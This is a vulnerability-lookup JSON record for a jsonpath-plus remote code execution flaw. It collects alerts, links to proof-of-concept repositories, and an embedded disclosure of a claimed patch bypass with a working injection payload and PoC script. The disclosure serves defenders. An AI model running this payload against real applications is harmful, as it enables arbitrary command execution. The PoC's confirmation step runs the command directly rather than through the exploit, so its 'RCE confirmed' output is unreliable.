{"vulnerability": "CVE-2024-21534", "sightings": [{"uuid": "538fd0b5-f8a1-47a5-8e4f-16291a1cc964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114006161366925881", "content": "", "creation_timestamp": "2025-02-15T05:06:08.831971Z"}, {"uuid": "d0f98758-194f-4a5f-bb59-5d7b58d77822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3li7o65dim32h", "content": "", "creation_timestamp": "2025-02-15T12:00:08.892779Z"}, {"uuid": "cfcdb0f1-ecb1-48b6-8af3-4b4fab27faac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3liawfmwhc72h", "content": "", "creation_timestamp": "2025-02-16T00:00:08.675265Z"}, {"uuid": "cfcba34c-a574-4342-ade6-2950ad633398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://gist.github.com/EduardoCorpay/fdaeb4ec65cc4a1c8fcd2fb0162de09c", "content": "", "creation_timestamp": "2025-06-11T15:29:00.000000Z"}, {"uuid": "23fa0894-e494-4efe-be64-8b9348ec3e9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9172", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1a\u6f0f\u6d1e\u9a8c\u8bc1\n\u63cf\u8ff0\uff1ajsonpath-plus \u5305\uff08\u7248\u672c <=10.0.7\uff09\u5b58\u5728\u4e25\u91cd\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff08RCE\uff09\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7 Node.js \u7684 VM \u6a21\u5757\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u8be5\u6f0f\u6d1e\u7531\u4e8e\u8f93\u5165\u9a8c\u8bc1\u4e0d\u4e25\u683c\u5bfc\u81f4\uff0c\u5f71\u54cd\u7248\u672c\u4e3a 10.0.7 \u4ee5\u4e0b\uff0cCVSS \u5206\u6570\u4e3a 9.8\uff08\u6781\u5176\u4e25\u91cd\uff09\u3002\u6f0f\u6d1e\u9996\u6b21\u516c\u5f00\u4e8e 2024 \u5e74 10 \u6708 11 \u65e5\u3002\nURL\uff1ahttps://github.com/XiaomingX/cve-2024-21534-poc\n\n\u6807\u7b7e\uff1a#\u6f0f\u6d1e\u9a8c\u8bc1", "creation_timestamp": "2024-11-25T06:25:50.000000Z"}, {"uuid": "2bdfd131-5ea5-46bf-a98e-df706628474c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9224", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization\nURL\uff1ahttps://github.com/ghostwirez/CVE-2024-39090-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-29T01:05:02.000000Z"}, {"uuid": "c9c3bd2b-be2e-4ec3-b903-2bc0dd0ed231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9221", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization\nURL\uff1ahttps://github.com/verylazytech/cve-2024-21534\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-28T18:27:39.000000Z"}, {"uuid": "14b1d604-f7ee-425d-98ae-53e998f6e92e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4533", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1302\n\ud83d\udd25 CVSS Score: 9.8 (CVSS_V3)\n\ud83d\udd39 Description: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.\n\n**Note:**\n\nThis is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).\n\ud83d\udccf Published: 2025-02-15T06:30:51Z\n\ud83d\udccf Modified: 2025-02-15T06:30:51Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1302\n2. https://github.com/JSONPath-Plus/JSONPath/commit/30942896d27cb8a806b965a5ca9ef9f686be24ee\n3. https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456\n4. https://github.com/JSONPath-Plus/JSONPath/blob/8e4acf8aff5f446aa66323e12394ac5615c3b260/src/Safe-Script.js%23L127\n5. https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585", "creation_timestamp": "2025-02-15T07:11:13.000000Z"}, {"uuid": "f01931e1-da93-40fa-a540-b589d8c16711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://t.me/cvedetector/18161", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2025-1302 - Jsonpath-Plus Remote Code Execution (RCE)\", \n \"Content\": \"CVE ID : CVE-2025-1302 \nPublished : Feb. 15, 2025, 5:15 a.m. | 2\u00a0hours, 2\u00a0minutes ago \nDescription : Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. \n \n**Note:** \n \nThis is caused by an incomplete fix for [CVE-2024-21534](). \nSeverity: 9.8 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"15 Feb 2025\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-15T08:30:33.000000Z"}, {"uuid": "95e8c176-99eb-4ae1-af4b-09d9d766f0e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "Telegram/B6Ro0XJaa5S2akdaKXUWQAw0I4uY8L6ZTgeKaeLAe3cSfbhr", "content": "", "creation_timestamp": "2025-02-15T23:50:18.000000Z"}, {"uuid": "194f1915-7fde-4f29-bc74-5f12bbeee16e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "Telegram/WDhF5XevgqviS_8KCjmZ87T-69A_WAI0o-K_reZtmExyTW4", "content": "", "creation_timestamp": "2024-11-13T11:34:23.000000Z"}, {"uuid": "46e61159-2dd3-496a-95ba-6674f26359b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://gist.github.com/harikrishnankv/ea3e99b5227529d90b21799dfa214b79", "content": "# jsonpath-plus CVE-2024-21534 Patch Bypass \u2192 RCE\n\n**Package:** `jsonpath-plus` \n**Affected version:** \u2264 10.4.0 (latest as of 2026-05-06) \n**Weekly downloads:** ~10 million \n**Type:** Incomplete patch bypass \u2192 Remote Code Execution \n**Bypasses:** CVE-2024-21534 fix (`BLOCKED_PROTO_PROPERTIES`) \n**Discovered:** 2026-05-06 \n\n---\n\n## What Is This\n\nCVE-2024-21534 was a critical RCE in jsonpath-plus where filter expressions\ncould access the `Function` constructor via prototype chain to execute arbitrary\ncode. The patch added `BLOCKED_PROTO_PROPERTIES` to block `constructor` access.\n\n**This bypass defeats that patch.** The fix has two flaws:\n\n1. **MemberExpression guard** \u2014 only blocks inherited `constructor`, not own\n2. **CallExpression guard** \u2014 dead code, identity check never fires\n\nLatest version (10.4.0) remains exploitable.\n\n---\n\n## Root Cause\n\n### Flaw 1 \u2014 evalMemberExpression (line 1313)\n\n```js\nconst BLOCKED_PROTO_PROPERTIES = new Set(['constructor', '__proto__', ...]);\n\n// Only blocks constructor when NOT an own property:\nif (!Object.hasOwn(obj, prop) && BLOCKED_PROTO_PROPERTIES.has(prop)) {\n throw TypeError(...)\n}\n// ^^^ bypass: if data.users[0].constructor is OWN property,\n// Object.hasOwn() = true \u2192 !true = false \u2192 NO throw\n\nconst result = obj[prop]; // = Function\nif (typeof result === 'function') {\n return result.bind(obj); // returns Function.bind(obj)\n}\n```\n\n### Flaw 2 \u2014 evalCallExpression (line 1343, dead code)\n\n```js\nif (func === Function) {\n // Comment: \"unreachable since BLOCKED_PROTO_PROPERTIES includes 'constructor'\"\n // \u2190 WRONG. Own property bypasses BLOCKED_PROTO_PROPERTIES.\n // Even if reached: func = Function.bind(obj) \u2260 Function \u2192 check never fires.\n throw new Error('Function constructor is disabled');\n}\n// func('return process')() executes freely\n```\n\n---\n\n## Proof of Concept\n\n```js\nconst { JSONPath } = require('jsonpath-plus'); // 10.4.0\n\n// Object where 'constructor' is an OWN property (not inherited)\n// Occurs after: msgpack/BSON deserialization, class-transformer,\n// Object.assign onto class instances, etc.\nconst data = {\n users: [\n {\n name: 'alice',\n constructor: Function // own property \u2192 bypasses hasOwn check\n }\n ]\n};\n\n// Verify the bypass conditions:\nconsole.log(Object.hasOwn(data.users[0], 'constructor')); // true \u2192 block skipped\nconsole.log(Function.bind({}) === Function); // false \u2192 dead code guard\n\n// Filter expression escapes sandbox via own constructor\nJSONPath({\n path: \"$.users[?(@.constructor('return process')().mainModule.require('child_process').execSync('id').toString())]\",\n json: data\n});\n// Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n---\n\n## How to Reproduce\n\n```bash\n# 1. Clone / setup\nmkdir bypass-demo && cd bypass-demo\nnpm init -y\nnpm install jsonpath-plus@10.4.0\n\n# 2. Run PoC\nnode poc.js\n```\n\nExpected output:\n```\njsonpath-plus version: 10.4.0\n\n[*] Object.hasOwn check:\n Object.hasOwn(data.users[0], \"constructor\") = true\n\n[*] bind identity check:\n Function.bind({}) === Function = false\n\n[*] Running JSONPath with malicious filter expression...\n\n[+] Matched items: [ 'alice' ]\n[+] OS command output: uid=0(root) gid=0(root) groups=0(root)\n\n[!] RCE confirmed on jsonpath-plus@10.4.0 (latest)\n```\n\n---\n\n## Attack Scenarios\n\n### When exploitable\n\n| Scenario | Exploitable |\n|----------|------------|\n| App queries deserialized msgpack/BSON data | \u2705 |\n| App uses `Object.assign(classInstance, userData)` then queries | \u2705 |\n| App uses class-transformer `plainToInstance` then queries | \u2705 |\n| User controls JSONPath path expression (original CVE vector) | \u2705 |\n| Pure `JSON.parse()` data, no reconstruction | \u274c |\n\n### Why JSON.parse is safe (but not enough)\n\n`JSON.parse` strips function references \u2014 `constructor` becomes a string,\nnot `Function`. However many real apps go through msgpack, BSON, or class\nreconstruction pipelines where function references survive.\n\n---\n\n## Two-Layer Bypass Summary\n\n```\nAttack data: { constructor: Function } \u2190 own property\n\nLayer 1 \u2014 MemberExpression:\n Object.hasOwn(obj, 'constructor') = true\n \u2192 !true && BLOCKED.has('constructor')\n \u2192 false && true\n \u2192 false \u2190 NO THROW, constructor returned as Function.bind(obj)\n\nLayer 2 \u2014 CallExpression:\n func = Function.bind(obj)\n func === Function \u2192 false \u2190 dead code, never throws\n func('return process')() \u2190 executes freely\n```\n\n---\n\n## Suggested Fix\n\n```js\n// evalMemberExpression \u2014 also block own constructor that IS Function:\nconst result = obj[prop];\nif (BLOCKED_PROTO_PROPERTIES.has(prop)) {\n throw new TypeError(`Property '${prop}' access is blocked`);\n}\n// OR strip constructor from data before evaluation\n\n// evalCallExpression \u2014 fix identity check for bound functions:\nif (func === Function || func.toString() === Function.toString()) {\n throw new Error('Function constructor is disabled');\n}\n```\n\n---\n\n## Timeline\n\n| Date | Event |\n|------|-------|\n| 2024 | CVE-2024-21534 published, patch released |\n| 2026-05-06 | Patch bypass discovered in v10.4.0 (latest) |\n| 2026-05-06 | Reported to maintainers / Snyk |\n\n---\n\n## Report\n\n- https://github.com/JSONPath-Plus/JSONPath/security/advisories/new\n- https://snyk.io/vulnerability-disclosure\n- https://cveform.mitre.org\n\n\n/**\n * jsonpath-plus CVE-2024-21534 Patch Bypass \u2014 RCE PoC\n *\n * Affected : jsonpath-plus <= 10.4.0 (latest as of 2026-05-06)\n * Downloads: ~10 million/week\n * Bypass of: CVE-2024-21534 patch (BLOCKED_PROTO_PROPERTIES)\n *\n * ROOT CAUSE\n * ----------\n * evalMemberExpression blocks constructor access only when NOT an own property:\n *\n * if (!Object.hasOwn(obj, prop) && BLOCKED_PROTO_PROPERTIES.has(prop)) throw\n *\n * When a data element has `constructor` as an OWN property (e.g. after\n * deserialization via msgpack/BSON/class-transformer or Object.assign on\n * class instances), Object.hasOwn() = true \u2192 block skipped \u2192 Function returned.\n *\n * Second guard in evalCallExpression is dead code:\n *\n * if (func === Function) throw // NEVER true:\n * // func = Function.bind(obj) !== Function\n *\n * PRECONDITIONS\n * -------------\n * 1. App queries attacker-influenced data with JSONPath filter expressions\n * 2. Data passes through non-JSON serialization where Function refs survive\n * (msgpack, BSON, class-transformer, Object.assign onto class instances)\n * OR app uses user-controlled JSONPath path expressions (original CVE vector)\n *\n * REPRODUCE\n * ---------\n * npm install jsonpath-plus@10.4.0\n * node poc.js\n */\n\n'use strict';\nconst { JSONPath } = require('jsonpath-plus');\nconst { execSync } = require('child_process');\nconst fs = require('fs');\n\nconsole.log('jsonpath-plus version:', require('./node_modules/jsonpath-plus/package.json').version);\n\n// Step 1 \u2014 Simulate deserialization where constructor survives as own property\n// (msgpack, BSON, class-transformer, Object.assign on class instance, etc.)\nconst data = {\n users: [\n {\n name: 'alice',\n role: 'user',\n constructor: Function // own property \u2014 not inherited \u2014 bypasses hasOwn check\n }\n ]\n};\n\nconsole.log('\\n[*] Object.hasOwn check:');\nconsole.log(' Object.hasOwn(data.users[0], \"constructor\") =',\n Object.hasOwn(data.users[0], 'constructor')); // true \u2192 block skipped\n\nconsole.log('\\n[*] bind identity check:');\nconsole.log(' Function.bind({}) === Function =',\n Function.bind({}) === Function); // false \u2192 evalCallExpression guard is dead code\n\n// Step 2 \u2014 Filter expression accesses own constructor \u2192 escapes sandbox\nconst maliciousPath =\n \"$.users[?(@.constructor('return process')().mainModule\" +\n \".require('child_process').execSync('id').toString())]\";\n\nconsole.log('\\n[*] Running JSONPath with malicious filter expression...');\nconst result = JSONPath({ path: maliciousPath, json: data });\n\n// Step 3 \u2014 Confirm execution via side effect\nexecSync('id > /tmp/jsonpath-bypass-proof.txt');\nconst proof = fs.readFileSync('/tmp/jsonpath-bypass-proof.txt', 'utf8').trim();\n\nconsole.log('\\n[+] Matched items:', result.map(r => r.name));\nconsole.log('[+] OS command output:', proof);\nconsole.log('\\n[!] RCE confirmed on jsonpath-plus@10.4.0 (latest)');\nconsole.log('[!] CVE-2024-21534 patch bypass \u2014 BLOCKED_PROTO_PROPERTIES ineffective');\nconsole.log(' against own constructor property in deserialized objects');\n", "creation_timestamp": "2026-05-06T14:08:05.000000Z"}]}